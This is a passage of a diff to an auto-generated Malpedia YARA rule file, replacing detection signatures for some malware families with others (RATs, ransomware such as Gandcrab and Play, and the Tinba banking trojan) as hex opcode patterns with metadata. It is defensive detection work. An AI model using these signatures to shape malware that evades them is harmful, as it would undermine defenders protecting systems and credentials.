+		$sequence_1 = { 48d3c8 4533c0 33d2 33c9 ff15???????? 488d0d505b0100 eb0c }
+		$sequence_2 = { 488d152c7d0000 b914000000 e8???????? 4885c0 7452 }
+		$sequence_3 = { 0f84eb000000 4885c0 0f85e4000000 4d3bc1 0f84d1000000 8b7500 498b9cf700a10100 }
+		$sequence_4 = { 8b0c8e 4903ca 483bcf 721a 438b84168c000000 }
+		$sequence_5 = { 746d 4533c9 8d5772 4533c0 488bc8 ff93c8020000 }
+		$sequence_6 = { 442bc9 4183f90f 7779 428b8c8ef89a0000 4803ce ffe1 }
+		$sequence_7 = { f2410f1004c1 488d15d6860000 f20f1014c2 f20f1025???????? }
+		$sequence_8 = { ff9778020000 4c63f0 4983feff 0f84ef000000 }
+		$sequence_9 = { 8b542430 48891401 488d0d4ab90000 e8???????? }
 
 	condition:
-		7 of them and filesize < 115712
+		7 of them and filesize < 249856
 }
-rule MALPEDIA_Elf_Bashlite_Auto : FILE
+rule MALPEDIA_Win_Neddnloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bbeb65b7-8b2b-54dc-9314-a8bcbc56853e"
+		id = "852b40fe-2e5d-50aa-b642-537ac76dade8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.bashlite_auto.yar#L1-L94"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neddnloader_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "98d7f6d0b73040daa4a477a42fca0025382c8a865bb2020813f6076b3c9fb152"
+		logic_hash = "f033318b8bebdad1df405535c03ee01ef3d70d6b1b4f8bc82d01aaedd0dfc4d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143059,30 +142905,38 @@ rule MALPEDIA_Elf_Bashlite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 750c c785ecefffff01000000 eb0a c785ecefffff00000000 }
-		$sequence_1 = { f7d0 21d0 3345fc c9 c3 }
-		$sequence_2 = { e8???????? 8945ec 837dec00 750b }
-		$sequence_3 = { 89c2 89d0 c1e81f 01d0 }
-		$sequence_4 = { 83f8ff 750c e8???????? 8b00 83f873 }
-		$sequence_5 = { 760f e8???????? c7001c000000 31c0 }
-		$sequence_6 = { eb0a c785ecefffff00000000 8b85ecefffff c9 }
-		$sequence_7 = { eb19 e8???????? c70016000000 e8???????? c70016000000 }
+		$sequence_0 = { 57 ff15???????? 8b4df8 56 3bc8 }
+		$sequence_1 = { 8d43ff 3bc8 7311 0fb702 0fb731 663bc6 }
+		$sequence_2 = { 8b03 8b5508 69c0b179379e c1e813 33c9 }
+		$sequence_3 = { 0fb731 663bc6 7506 83c102 83c202 }
+		$sequence_4 = { 83c204 3bcf 72f0 8d43ff 3bc8 7311 }
+		$sequence_5 = { eb02 0008 8b45f8 83c0f4 }
+		$sequence_6 = { 57 e8???????? 2b5d10 83c40c }
+		$sequence_7 = { 8d84241c040000 50 68???????? b900230400 }
+		$sequence_8 = { 4133bc8e803c0100 4133bc8680480100 418bc0 41337d20 c1e808 0fb6d0 418bc1 }
+		$sequence_9 = { 488d0587930000 483bc8 7405 e8???????? bf0d000000 }
+		$sequence_10 = { 4533948480590100 458b848c804d0100 410fb6c1 4533848480510100 45335538 410fb6c3 4533848480550100 }
+		$sequence_11 = { 440fb68c29804c0100 c1e810 0fb6c8 41c1e108 0fb68429804c0100 4433c8 }
+		$sequence_12 = { 410fb6c2 41339c8480440100 45337508 410fb6c3 41339c8480400100 }
+		$sequence_13 = { 4433c0 400fb6c7 420fb68420803b0100 41c1e008 }
+		$sequence_14 = { 4883ec28 4c8bc1 4c8d0df20effff 498bc9 e8???????? }
+		$sequence_15 = { 0f94c0 8944244c 488d05caef0000 4a8b14e0 41837c175000 }
 
 	condition:
-		7 of them and filesize < 2310144
+		7 of them and filesize < 3438592
 }
-rule MALPEDIA_Win_Remy_Auto : FILE
+rule MALPEDIA_Win_Brbbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e336b399-c824-5cff-9d79-2b28637c647b"
+		id = "6f8ffa7c-cd8c-50e9-99ce-be919b2bf777"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remy_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.brbbot_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "78b349d77eab72ccd2cb565c0bcdfc5bac491569a0a70fac7617d2ce3551a21d"
+		logic_hash = "81c84b2ac34bd64175981dcc2195841d305509a8b4adcc1041ffc068cd7e1797"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143096,32 +142950,32 @@ rule MALPEDIA_Win_Remy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668945e1 8845e3 8b4508 885ddc 50 b808000000 8d5ddc }
-		$sequence_1 = { 899c24a0000000 89bc24c0000000 899c24c4000000 899c24c8000000 8b442410 8d542418 52 }
-		$sequence_2 = { 83c404 8db558ffffff e8???????? c645fc01 8b08 8bb564ffffff 8d41f0 }
-		$sequence_3 = { 746e 50 e8???????? 8bf0 eb66 8d4de0 }
-		$sequence_4 = { 8b4d20 b802000000 c745fc00000000 51 6689459c ff15???????? }
-		$sequence_5 = { 8d8d4cffffff 8d9548feffff 898500feffff 898d04feffff 899508feffff 8d853cffffff 8d8d94feffff }
-		$sequence_6 = { c70001000000 8b4620 50 895dac 895da8 ff15???????? 83f8ff }
-		$sequence_7 = { c684243003000002 c7842480010000fe454c35 66c7842484010000fe4c c684248601000000 8d842480010000 800027 40 }
-		$sequence_8 = { 52 6806100000 68ffff0000 56 ff15???????? 6a04 8d45d0 }
-		$sequence_9 = { 8bce e8???????? 837e1410 7202 8b36 8d472c }
+		$sequence_0 = { 488d0d14310000 4533c9 ba00000040 4489442420 ff15???????? 488905???????? }
+		$sequence_1 = { 4c8d41ff 488b4d00 e8???????? 443926 7433 488b4d00 488d15e1ca0000 }
+		$sequence_2 = { 8b4d48 41b801000000 4883caff e8???????? 807d580a 4c8d05af3dffff 740f }
+		$sequence_3 = { 488906 8b05???????? 894608 0fb705???????? 6689460c 488bc6 660f1f440000 }
+		$sequence_4 = { 48ffcf 75f5 488bce e8???????? 488bf8 }
+		$sequence_5 = { 81cb00000780 8bc3 4883c448 5f 5b c3 4c8d0562ec0000 }
+		$sequence_6 = { 57 4881ece0010000 488b05???????? 4833c4 48898424d0010000 33ff 33c9 }
+		$sequence_7 = { 7516 488d051cb80000 488b4c2430 483bc8 7405 e8???????? }
+		$sequence_8 = { 750d 488bce e8???????? e9???????? 4c8d2d31bb0000 8bcb 488beb }
+		$sequence_9 = { 8a45d9 4b8b8cf8c05a0100 88443139 4b8b84f8c05a0100 8854303a eb4c }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 198656
 }
-rule MALPEDIA_Win_Jackpos_Auto : FILE
+rule MALPEDIA_Win_Dripion_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "705d47f5-8c33-5d05-9f3c-cd8693aecd05"
+		id = "6e941fbc-0092-5680-a9f8-3d85cce1c3ca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jackpos_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dripion_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "aebd9f3ce681adad20f8842dd1ad147a46f77997d7d0dde94d3c3be1cf2f594d"
+		logic_hash = "3337814c1f32071db01b4a02df38137e3cc930cfdb33776a0eb841a83537dbda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143135,32 +142989,32 @@ rule MALPEDIA_Win_Jackpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945e4 83f805 7d10 668b4c4310 66890c45f8124200 40 ebe8 }
-		$sequence_1 = { 57 8bf8 8b450c 397518 0f86a4000000 8b4508 83c008 }
-		$sequence_2 = { 8b7508 56 c745fc04000000 e8???????? 83c404 837e7010 }
-		$sequence_3 = { d1ff 57 8b7d14 57 }
-		$sequence_4 = { c60700 80780100 7e04 40 8945c4 8a00 3c7f }
-		$sequence_5 = { 8b10 83c40c 51 52 8d4594 50 }
-		$sequence_6 = { 03c9 51 8b4df8 8d1459 52 e8???????? 8b4614 }
-		$sequence_7 = { 85db 0f86f8000000 57 8b7e14 }
-		$sequence_8 = { ff15???????? 6aff 6a00 8bc6 8bcb e8???????? }
-		$sequence_9 = { c645fc01 50 c745f001000000 e8???????? c745fc02000000 bb03000000 57 }
+		$sequence_0 = { ffd6 0faff8 ffd6 0faff8 }
+		$sequence_1 = { ffd6 0faff8 8d3c7f ffd6 }
+		$sequence_2 = { 740f 3ccf 740b 34cf }
+		$sequence_3 = { ffd6 03f8 ffd6 8bd8 ffd6 0fafd8 }
+		$sequence_4 = { ffd6 03f8 8d3c7f ffd6 }
+		$sequence_5 = { 8bf8 ffd6 0faff8 8d3c7f ffd6 }
+		$sequence_6 = { 7513 6a64 ff15???????? 68???????? ff15???????? }
+		$sequence_7 = { 8bf8 ffd6 0faff8 8d3c7f }
+		$sequence_8 = { ffd6 8bf8 ffd6 0faff8 8d3c7f ffd6 }
+		$sequence_9 = { ffd6 8bf8 ffd6 0faff8 8d3c7f }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Rokrat_Auto : FILE
+rule MALPEDIA_Win_Highnote_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "72ccb458-56ca-5321-9a37-7df4cd9fbcb3"
+		id = "b0d28496-8673-59fb-b567-198b148df4f3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rokrat_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.highnote_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "5cd57f30b8bc2958324b2df203589daea09f2ea7985ac5d6acd0baa6db2468f2"
+		logic_hash = "7cacc14b2d0dfaf54710df19550a1288a5ab7f5eb6146a6937a043c66ae24b0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143174,38 +143028,32 @@ rule MALPEDIA_Win_Rokrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 6a04 33c0 }
-		$sequence_1 = { 668945c0 e8???????? c645fc03 8b45bc }
-		$sequence_2 = { 50 e8???????? 6a10 33c0 }
-		$sequence_3 = { 50 e8???????? 8d8e0c010000 8d4550 3bc8 }
-		$sequence_4 = { 0fb7c1 50 0fb74208 c1e910 51 50 0fb74212 }
-		$sequence_5 = { 50 ff15???????? e8???????? 40 }
-		$sequence_6 = { 50 e8???????? 6a18 33c0 }
-		$sequence_7 = { 68???????? e8???????? 837e1408 7204 8b06 eb02 8bc6 }
-		$sequence_8 = { 50 e8???????? 8d8edc000000 8d4520 }
-		$sequence_9 = { ff15???????? 50 e8???????? 59 6a64 }
-		$sequence_10 = { 897dfc e8???????? 68???????? 8d4dd8 e8???????? }
-		$sequence_11 = { 89442410 7e34 8d9b00000000 56 }
-		$sequence_12 = { 89442410 807c244400 7558 85db 7454 68d3010000 }
-		$sequence_13 = { 89442410 80f925 0f859d030000 3808 }
-		$sequence_14 = { 89442410 7c7c 8b7758 8b9f8c000000 81c630010000 }
-		$sequence_15 = { 89442410 7e19 68110b0000 68???????? }
+		$sequence_0 = { 3c7b bc9e36398f 8027e9 82ad42476080cd e009 }
+		$sequence_1 = { 47 365e 3007 7bae 97 9d 884d13 }
+		$sequence_2 = { a8b9 a1???????? 9c 6857414608 d4dc 59 93 }
+		$sequence_3 = { 33c5 8945fc 8b4508 53 6808090000 8945e4 e8???????? }
+		$sequence_4 = { 4f 59 7def 889de81be9ec b96b0b724f 262415 3a1f }
+		$sequence_5 = { 0e ed 47 6908b79d84b8 6935????????3e1f20f8 4a d14529 }
+		$sequence_6 = { e76e a9a4fec7f3 1b90bff8ccdd b1e4 f7f4 }
+		$sequence_7 = { 0f85dc000000 b763 42 20ce e04b 2bea }
+		$sequence_8 = { 1cfe 5f 3d4b9c06b4 12a4c5ea7849d5 ba7ab47152 1c98 d24cdca8 }
+		$sequence_9 = { 3cff 145d 853e 235ee7 }
 
 	condition:
-		7 of them and filesize < 2932736
+		7 of them and filesize < 321536
 }
-rule MALPEDIA_Win_Gandcrab_Auto : FILE
+rule MALPEDIA_Win_Urausy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5425f9cd-8fb4-510e-a39f-093e7eb655d2"
+		id = "1beffaf4-c79f-5031-ba16-920ad7ce2336"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gandcrab_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.urausy_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "65a176078bb1690a98a0fbd0a289d5aa1233664bdaee132644de05bfc651c8a8"
+		logic_hash = "8b8a7bd5c9e36633624e07a893f13b5d5c82edf3b42773503b98b1177601ac24"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143219,32 +143067,32 @@ rule MALPEDIA_Win_Gandcrab_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c3 8d5e04 03d8 837f4800 741b ff7750 ff15???????? }
-		$sequence_1 = { ff777c ff15???????? ff7778 8bf0 ff15???????? }
-		$sequence_2 = { ff15???????? ff7728 8bf0 ff15???????? 03c3 8d5e04 }
-		$sequence_3 = { ff15???????? 03c3 8d5e04 03d8 837f3000 }
-		$sequence_4 = { ff15???????? ff7734 8bf0 ff15???????? 03c3 8d5e04 }
-		$sequence_5 = { 03c3 8d5e04 03d8 837f3000 741b }
-		$sequence_6 = { 5f 66894c46fe 8bc6 5e }
-		$sequence_7 = { ff15???????? ff7778 8bf0 ff15???????? 03c3 }
-		$sequence_8 = { ff15???????? 03c3 8d5e04 03d8 837f3c00 741b ff7744 }
-		$sequence_9 = { 741b ff777c ff15???????? ff7778 8bf0 }
+		$sequence_0 = { ff7508 e8???????? 8945ec ff7514 e8???????? 8945e8 }
+		$sequence_1 = { ff75a0 ff75ec e8???????? 33c0 b4ff b0ff c1c008 }
+		$sequence_2 = { e8???????? 5e 6a00 6a00 6a00 }
+		$sequence_3 = { ff7594 ff7598 ff75ec e8???????? 33c0 }
+		$sequence_4 = { 6a28 ff75e4 ff75e8 6802000050 68???????? 68???????? 6800000400 }
+		$sequence_5 = { e8???????? 53 e8???????? 8d85f8fdffff }
+		$sequence_6 = { ff75e8 e8???????? c9 c21000 55 8bec 81c4ecefffff }
+		$sequence_7 = { 8b4508 50 8b00 ff5018 8d45e0 }
+		$sequence_8 = { 83c4e8 833d????????01 7504 c9 }
+		$sequence_9 = { e8???????? c9 c20400 55 8bec 83c4e8 8d45f0 }
 
 	condition:
-		7 of them and filesize < 1024000
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Runningrat_Auto : FILE
+rule MALPEDIA_Win_Mirrorkey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7ed2390-7d31-581c-a1e4-fdb77337ca48"
+		id = "23fdf476-29dd-5c48-a2d0-67c951326855"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.runningrat_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mirrorkey_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "4ddbc260dd07c2863631004b7f152c53ea1c57a6d19004876f01cbe090f0559f"
+		logic_hash = "23c2e6c1488c0365d27087d2deccf67b069663ff42f157533379a432751ee152"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143258,37 +143106,32 @@ rule MALPEDIA_Win_Runningrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 ff15???????? 56 ff15???????? 8b8c2418010000 }
-		$sequence_1 = { 891481 ff4608 e9???????? 83fa12 750a c744242c07000000 eb07 }
-		$sequence_2 = { 5d 83c408 c3 8b442434 8b4c242c 56 }
-		$sequence_3 = { dec1 dee9 def9 dc0d???????? }
-		$sequence_4 = { 50 03cb 51 e8???????? 8b542428 0fb74206 47 }
-		$sequence_5 = { f3a4 ff15???????? 5f 5e 5d 33c0 }
-		$sequence_6 = { 8b4764 50 e8???????? 33c0 83c404 8bcf 894764 }
-		$sequence_7 = { 03c8 40 8a0c29 884c03ff 8b4e04 }
-		$sequence_8 = { 8be8 83c404 83fdfd 7515 }
-		$sequence_9 = { 8dbc24a4010000 f3ab 8d8c2408020000 51 }
-		$sequence_10 = { 83c204 89542420 3bce 741f 8b948c8c000000 8b9c242c010000 }
-		$sequence_11 = { 6a00 6a00 8b82a8000000 50 68???????? 6a00 }
-		$sequence_12 = { 50 e8???????? 8b5644 68a2aedeac 68ce9a32f7 68c9600000 52 }
-		$sequence_13 = { 7336 8d642400 837c241c00 0f84cc020000 0fb613 ff4c241c }
-		$sequence_14 = { 8bd1 83e201 d1e9 895618 83f903 0f8761060000 }
+		$sequence_0 = { 56 8d4db8 c745cc0f000000 c745c800000000 c645b800 }
+		$sequence_1 = { 50 68???????? 53 c745a400000000 e8???????? 0fbe4317 8d4da8 }
+		$sequence_2 = { 8b06 eb02 8bc6 c60000 c745fc00000000 8bce a1???????? }
+		$sequence_3 = { 7406 8a740608 eb03 8a76fc 85c0 752f }
+		$sequence_4 = { 88442433 8d7808 0f1f440000 53 }
+		$sequence_5 = { 50 e8???????? ff75fc 8d45fc ff75f8 50 }
+		$sequence_6 = { 8b85f4feffff 33f6 3930 7446 33db }
+		$sequence_7 = { 56 ff15???????? 5f 5e c7430400000000 }
+		$sequence_8 = { 32d3 2503000080 7905 48 }
+		$sequence_9 = { 85c0 7405 8a0c06 eb03 8a4ef4 }
 
 	condition:
-		7 of them and filesize < 275456
+		7 of them and filesize < 117760
 }
-rule MALPEDIA_Win_Netkey_Auto : FILE
+rule MALPEDIA_Win_Play_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d0a2d0e1-28d1-5f88-b1cb-dda359954bd2"
+		id = "fb8bcd82-2890-51e9-aef7-15cdb7334359"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netkey_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.play"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.play_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "daf69a83c7310935a12c421c94563aee301c2dd28fd19c71dd25e72dc29acd85"
+		logic_hash = "98ed430384a69d155a8a3b8add1f6db92e55c318ad1d4defbfbdd225c9837ee9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143302,32 +143145,32 @@ rule MALPEDIA_Win_Netkey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bca 0fa4c103 c1e003 03f0 13d1 0fa4f202 c1e602 }
-		$sequence_1 = { 786d 8b4d08 8bd6 e8???????? 85c0 }
-		$sequence_2 = { 83fa03 7511 8b45fc 8b0c85a8214400 8a06 }
-		$sequence_3 = { 83c40c 8d85f0dfffff 6800080000 50 6a00 56 ff15???????? }
-		$sequence_4 = { 83e10f eb02 33c9 8b450c 0fb684c8b02e4300 c1e804 }
-		$sequence_5 = { 05b0407c05 3146e8 8b4714 059ea0eb01 3146ec 8b4718 05???????? }
-		$sequence_6 = { 8b95b4efffff 46 8985f8efffff 8bc2 c1e802 40 3bf0 }
-		$sequence_7 = { e8???????? 51 e8???????? a3???????? 85c0 7974 }
-		$sequence_8 = { 8bc1 c1f806 83e13f 6bc930 8b0485a8214400 80640828fe ff36 }
-		$sequence_9 = { 3a4801 751c 83c702 83c002 84c9 75e4 }
+		$sequence_0 = { 85c9 7ff1 eb1d 8d85b1feffff 03c1 50 }
+		$sequence_1 = { 0f1005???????? 8945ac b854040000 6689856cffffff b8e0690000 0f114588 052496ffff }
+		$sequence_2 = { 898518feffff b879180000 0f118594feffff 898534ffffff f30f7e05???????? a1???????? 660fd68500ffffff }
+		$sequence_3 = { 02c0 02c2 888596feffff b9???????? e8???????? 8a85acfeffff }
+		$sequence_4 = { 8a857cfcffff fec0 c745e43d000000 0245fd 8845ff 888521ffffff b83e000000 }
+		$sequence_5 = { bbb410624c 8b0d???????? e8???????? 6aff ff75e8 ffd0 }
+		$sequence_6 = { e8???????? 33d2 8b4df4 f7f6 8bc2 8945e4 }
+		$sequence_7 = { 8955f8 894dfc e8???????? 8b0d???????? 33d2 }
+		$sequence_8 = { 889591feffff 888dc9feffff 888d81feffff b920000000 c60000 }
+		$sequence_9 = { e8???????? 2467 0fa1 ee d5d8 e9???????? 8c9f381b40b1 }
 
 	condition:
-		7 of them and filesize < 606208
+		7 of them and filesize < 389120
 }
-rule MALPEDIA_Win_Merdoor_Auto : FILE
+rule MALPEDIA_Win_Tinba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "840879eb-651f-58a0-a9dd-c8bbbd75be85"
+		id = "e9e77c24-46b9-5cf7-a828-2a850fe6f2a6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.merdoor_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinba_auto.yar#L1-L142"
 		license_url = "N/A"
-		logic_hash = "6ad90da4b59952ca06b1d837955ca9f12c104be55324a03e7aaa640c9c01019a"
+		logic_hash = "374a170ff41ebad47f064bc534bfadb5eb7ba02780fab8542e6fa86bf64ae9a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143341,32 +143184,35 @@ rule MALPEDIA_Win_Merdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41 0fb7c0 47 663102 83c202 6683f908 72cf }
-		$sequence_1 = { e8???????? 83c40c 8934fd78f30110 eb07 56 e8???????? 59 }
-		$sequence_2 = { 5d c20400 c7875404000001000000 8b07 }
-		$sequence_3 = { 8d4590 50 8d45a4 50 ff15???????? }
-		$sequence_4 = { 75f9 2bca 51 8d85acfeffff 50 8d8d7cfcffff e8???????? }
-		$sequence_5 = { b91a000000 f7f9 80c261 eb10 e8???????? 99 }
-		$sequence_6 = { e8???????? 8987e4020000 c645fc02 8d55c0 b8fe000000 c745c0a3008d00 33c9 }
-		$sequence_7 = { 8dbb78030000 c785dcfdffff01000000 7204 8b07 eb02 8bc7 }
-		$sequence_8 = { e8???????? 8987e4020000 c645fc02 8d55c0 b8fe000000 c745c0a3008d00 }
-		$sequence_9 = { 8b7310 8d4310 8b11 51 50 8d4508 }
+		$sequence_0 = { 8b7508 ad 50 56 }
+		$sequence_1 = { 8b4510 aa 8b450c ab }
+		$sequence_2 = { 6a00 6a00 ff750c 6a00 6a00 ff7508 }
+		$sequence_3 = { 8a241f 88240f 88041f 41 }
+		$sequence_4 = { 7416 66b80d0a 66ab b8436f6f6b ab b869653a20 }
+		$sequence_5 = { 7437 b912000000 48 8d3db0010000 807a180f }
+		$sequence_6 = { 72ee 87ce 89f8 29ce f3a4 29fe }
+		$sequence_7 = { bb0a000000 31d2 f7f3 52 41 }
+		$sequence_8 = { 3c0a 7304 0430 eb02 0437 aa c14d0804 }
+		$sequence_9 = { 40 eb12 ff7514 ff7510 ff750c }
+		$sequence_10 = { 85c0 741b 66b80d0a 66ab b855736572 }
+		$sequence_11 = { 8d7a33 f6c304 740a 834a3540 66a5 }
+		$sequence_12 = { 8b0e 3b4d10 7603 8b4d10 51 57 ff750c }
 
 	condition:
-		7 of them and filesize < 307200
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Aytoke_Auto : FILE
+rule MALPEDIA_Win_Naikon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c3996e13-6441-5e12-8e21-a4d953c38877"
+		id = "1a371971-3c14-5c5c-93ec-3bfac331df93"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aytoke_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.naikon_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "0f3d6db514704761aece6f3ecc8a4a906e89108d57be9f7f2ba95aab9464ffc7"
+		logic_hash = "83032b5030b393c588ce5d94661092c796ec6d6ab26688f2a44eab055633535d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143380,32 +143226,32 @@ rule MALPEDIA_Win_Aytoke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b450c 8b4d10 56 57 8b7d08 8d95dcfbffff }
-		$sequence_1 = { a1???????? 8b0d???????? 8b15???????? 8985a8f9ffff }
-		$sequence_2 = { ffd2 8b8594f9ffff 50 ff15???????? }
-		$sequence_3 = { 4d 4d 0b0c0d0e0f1011 1213 1415 }
-		$sequence_4 = { 7407 c6854feeffff01 6a14 ff15???????? 6890000000 ffd3 }
-		$sequence_5 = { 83c414 8d45c8 48 8a4801 40 }
-		$sequence_6 = { 881438 46 47 ebd7 8b8dd8fbffff }
-		$sequence_7 = { 8d55ec 52 b902000000 56 8945f0 66894dec ff15???????? }
-		$sequence_8 = { 4d 4d 0b0c0d0e0f1011 1213 1415 16 17 }
-		$sequence_9 = { 8bc6 c1f805 8b048500c44100 83e61f c1e606 8d443004 }
+		$sequence_0 = { 8bf8 59 3bfb 59 741d 8b06 2bc7 }
+		$sequence_1 = { eb05 397df8 7415 8d45f0 }
+		$sequence_2 = { 8975c4 8945b0 8b450c 8945bc 03f0 8b45e4 8b4f6c }
+		$sequence_3 = { 53 50 e8???????? 6a04 8d85f8fdffff 68???????? 50 }
+		$sequence_4 = { 8b06 03c3 68???????? 50 e8???????? 68???????? e9???????? }
+		$sequence_5 = { 03c8 83c00c 8903 8d45d8 6a0c 50 ff750c }
+		$sequence_6 = { e8???????? ff75fc e8???????? 83c414 eb02 33db }
+		$sequence_7 = { 6a10 68???????? e9???????? 6a00 ff75fc 53 8d853cffffff }
+		$sequence_8 = { 8b00 52 53 53 8b4010 }
